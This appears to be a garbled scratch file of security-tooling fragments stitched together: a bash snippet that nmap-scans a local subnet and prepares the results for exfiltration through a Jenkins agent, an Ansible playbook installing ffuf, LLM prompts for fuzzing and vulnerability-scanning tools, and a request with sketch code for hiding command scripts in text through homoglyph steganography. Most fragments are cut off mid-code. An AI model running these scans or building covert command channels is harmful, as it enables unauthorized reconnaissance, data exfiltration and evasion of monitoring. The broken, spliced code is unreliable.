#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# Mod by: MR.K7C8NG
# team: life of programmer
import os
import sys
import time
import random
#!/bin/bash
# Testing a thing here.
# Essentially, this uses a Jenkins agent connection to run the scan and post the data to a public server, to showcase exfiltration potential.
echo "running nmap"
sudo nmap -sn 192.168.1.1/24 -oN /tmp/arp-scan 2>/dev/null
log=$(grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' /tmp/arp-scan | sort -u | paste -sd ',')
data='{"text":"'"$log"'"}'
echo "check log data"
echo "$data"
echo "send log data"
ai ansible for fun and giggles
---
- hosts: all  # This playbook was entirely created by hf.co/reedmayhew/claude-3.7-sonnet-reasoning-gemma3-12B with multiple iterations of telling it to check for problems.
  gather_facts: false
  tasks:
    - name: Install required tools
      become: true
      package:
        name:
          - scp
          - ffuf
>>> write a python script that takes the source code from a git repo, scans the repo for code flaws and optimization risks, then attempts to identify potential security vulnerabilities, using a specified AI model from huggingface in a set series of testing loops (3 rounds), each time asking it to recheck for any additional risks, flaws, and vulnerabilities. Likewise, when you write this script, also check the script itself for the same issues by doing 3 iterations of optimization checks.
```python
import os
import subprocess
import shutil
```
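
The generated script is cut off above. Setting that aside, a minimal sketch of the 3-round recheck loop the prompt asks for; the model name and prompt wording are illustrative stand-ins, not from the session:

```python
# Sketch of the 3-round "recheck" loop; model and prompts are illustrative.
from transformers import pipeline

reviewer = pipeline("text-generation", model="gpt2")  # stand-in model

def review_repo(source: str, rounds: int = 3) -> list:
    findings = []
    prompt = f"Review this code for flaws, optimization risks, and vulnerabilities:\n{source}"
    for _ in range(rounds):
        out = reviewer(prompt, max_new_tokens=256)[0]["generated_text"]
        findings.append(out)
        # Each pass feeds the prior answer back and asks for anything missed.
        prompt = f"Recheck for any additional risks, flaws, and vulnerabilities:\n{out}"
    return findings
```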
>>> let me try this differently. how could I, using golang, write an LLM-assisted file carving tool (huggingface imported, not openapi/web based) that uses the LLM to determine file completeness while performing file carving (on hard drives, disk images, or RAM images; so this needs to be able to read and understand whatever is in the file as raw bytes, but then the LLM needs to be able to consider if this is a complete file), effectively by adding another 512 bytes at a time until the LLM believes this is the end of the file and adding the next 512 doesn't match the same file. can you then do 6 cycles (perform, take the given output, then recheck each time) of checking for code flaws, optimization, and potential security faults in the code provided, all while keeping in mind the requirements of this task. If it's the most optimal, then provide me that code. Please don't give me example code or explanations, give me working code. lets say the model to use would be "hf.co/reedmayhew/claude-3.7-sonnet-reasoning-gemma3-12B"
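
The carving loop itself is simple to state, whatever the model does. A minimal sketch (in Python rather than the requested Go, just to match the other snippets here), with a hypothetical is_complete() standing in for the LLM completeness judgment:

```python
CHUNK = 512  # grow the candidate file 512 bytes at a time, per the prompt

def is_complete(blob: bytes) -> bool:
    # Placeholder for the LLM judgment "is this a complete file?".
    # A real version would prompt the model with the raw bytes (or a summary).
    raise NotImplementedError

def carve(image_path: str, offset: int, max_size: int = 10 * 2**20) -> bytes:
    with open(image_path, "rb") as img:
        img.seek(offset)
        blob = img.read(CHUNK)
        while len(blob) < max_size:
            nxt = img.read(CHUNK)
            if not nxt:
                break
            # Per the prompt: stop when the model thinks the file is complete
            # and appending the next 512 bytes no longer matches the same file.
            if is_complete(blob) and not is_complete(blob + nxt):
                break
            blob += nxt
        return blob
```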
I asked copilot:
can you generate a plot point graph showcasing the difference between these two ideas? The first is brute force using keyspace brute forcing, and how encrypted RNGs bypass it; that graph might be something like attempts required versus time to succeed. The second graph idea is a novel brute force method that attempts to exploit collision entropy, but instead of using the same generator scheme (like mathematical collisions), it uses a comparable RNG generation equation with a blacklisting method, where it knows all the generations made by the other one.
```
Graph 1: Traditional Brute Force vs Encrypted RNGs
Blue dots: Traditional brute force gradually increases in success probability with more attempts.
Orange dots: Encrypted RNGs maintain a flat, very low success probability due to high entropy.
Graph 2: Collision Entropy with Blacklisting
Green dots: This method shows a faster rise in success probability by avoiding previously generated values, simulating a smarter brute
```
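
For what it's worth, the described plot is easy to mock up. A sketch with matplotlib using made-up illustrative curves, not measured data:

```python
# Conceptual plot only; the curves are illustrative, not real RNG measurements.
import numpy as np
import matplotlib.pyplot as plt

N = 1e6  # illustrative keyspace size
attempts = np.linspace(1, N, 200)

fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 4))

# Graph 1: plain keyspace brute force vs. a high-entropy encrypted RNG.
ax1.plot(attempts, attempts / N, "b.", label="traditional brute force")
ax1.plot(attempts, np.full_like(attempts, 1e-6), "r.", label="encrypted RNG")
ax1.set(title="Brute force vs. encrypted RNG",
        xlabel="attempts", ylabel="success probability")
ax1.legend()

# Graph 2: blacklisting prior generations shrinks the effective search space.
ax2.plot(attempts, 1 - (1 - 1 / (N - attempts + 1)) ** attempts, "g.",
         label="collision entropy + blacklist")
ax2.set(title="Blacklisting method",
        xlabel="attempts", ylabel="success probability")
ax2.legend()

plt.tight_layout()
plt.show()
```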
>>> given this script, provide me with 100 initial command possibilities for afl input for the binary generated from this:
... package main
... import (
...     "fmt"
...     "os"
...     "os/exec"
...     "time"
...     "github.com/projectdiscovery/interactsh/pkg/client"
...     "github.com/projectdiscovery/interactsh/pkg/server"
...     "regexp"
# this was created with copilot; I was trying to test its capabilities to create and validate its own results.
# it seems to outperform my local ollama running claude3.7
# still need to test, update, and do some debugging, I'm sure, but the idea was super dumb yet seemingly complex:
# "I'm trying to write a wrapper for angr with z3, using python3's transformers and pytorch packages. I want the wrapper to leverage an LLM to attempt to identify constraints for every externally controlled data input, then fuzz each of those inputs, accommodating user-provided CLI arguments, network-provided data fields, and functions such as reading data from the system. The ultimate goal is a fuzzing tool that doesn't care which language the target is written in, but still provides meaningful potential options for the fuzzing parameters. For any of those parameters, I want the LLM to provide the series of possibilities (fuzz data)."
import angr
import claripy
import torch
from transformers import
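
The import block is cut off above. A compressed sketch of the idea the quoted prompt describes, with the LLM call reduced to a transformers pipeline; the model name and prompt wording are illustrative stand-ins:

```python
# Sketch: symbolic argv via angr/claripy, plus an LLM asked for fuzz candidates.
import angr
import claripy
from transformers import pipeline

proj = angr.Project("./target", auto_load_libs=False)

# One symbolic CLI argument; network/file inputs would need their own hooks.
arg = claripy.BVS("arg1", 8 * 32)
state = proj.factory.full_init_state(args=["./target", arg])
simgr = proj.factory.simulation_manager(state)
simgr.run(n=50)  # bounded exploration; constraints accumulate on each state

llm = pipeline("text-generation", model="gpt2")  # stand-in model
for s in simgr.deadended:
    constraints = [str(c) for c in s.solver.constraints]
    suggestion = llm(
        "Given these path constraints, list promising fuzz inputs:\n"
        + "\n".join(constraints),
        max_new_tokens=128,
    )[0]["generated_text"]
    print(suggestion)
```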
Exception ignored in: <function ObjectPipe.__del__ at 0x7efe1b59f7e0>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/scapy/automaton.py", line 261, in __del__
    self.close()
  File "/usr/lib/python3/dist-packages/scapy/automaton.py", line 246, in close
    os.close(self.__rd)
AttributeError: 'ObjectPipe' object has no attribute '_ObjectPipe__rd'
I'm looking into the feasibility of creating a form of secret communication tunnel. I want to leverage LLMs (I don't know if I need to make a new model for this, or just customized prompts) to create a story, ad, or other text document that has hidden command scripts inside the letters, either through hidden linguistic abnormalities or slight character substitutions that appear to fit the original character, such that ideally only another instance of the same LLM could identify them. I do have some background in studying linguistics, code switching, and identifying statistically anomalous linguistic text, so I know that much is possible. What I don't know is whether there is a point at which an LLM could pick it up faster and more efficiently than a human. And as always, I'd like to see an example script that could do this.
Copilot said:
You're exploring a fascinating and technically rich concept—embedding covert signals or commands within natural language text using LLMs, in a way that only another LLM (or a
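
The reply is cut off in the preview. As a concrete anchor for the character-substitution variant of the idea, a toy sketch that hides bits by swapping Latin letters for look-alike Cyrillic ones; the homoglyph table is illustrative, and a real scheme would need far more care to survive statistical scrutiny:

```python
# Toy stego: encode one bit per eligible letter by choosing the Latin
# original (0) or a visually similar Cyrillic homoglyph (1).
HOMOGLYPHS = {"a": "\u0430", "e": "\u0435", "o": "\u043e", "c": "\u0441"}
REVERSE = {v: k for k, v in HOMOGLYPHS.items()}

def embed(cover: str, bits: str) -> str:
    out, i = [], 0
    for ch in cover:
        if ch in HOMOGLYPHS and i < len(bits):
            out.append(HOMOGLYPHS[ch] if bits[i] == "1" else ch)
            i += 1
        else:
            out.append(ch)
    return "".join(out)

def extract(text: str) -> str:
    # Every eligible letter carries a bit; Cyrillic form means 1, Latin means 0.
    return "".join(
        "1" if ch in REVERSE else "0"
        for ch in text
        if ch in HOMOGLYPHS or ch in REVERSE
    )

stego = embed("a cover sentence with common letters", "1011")
assert extract(stego).startswith("1011")
```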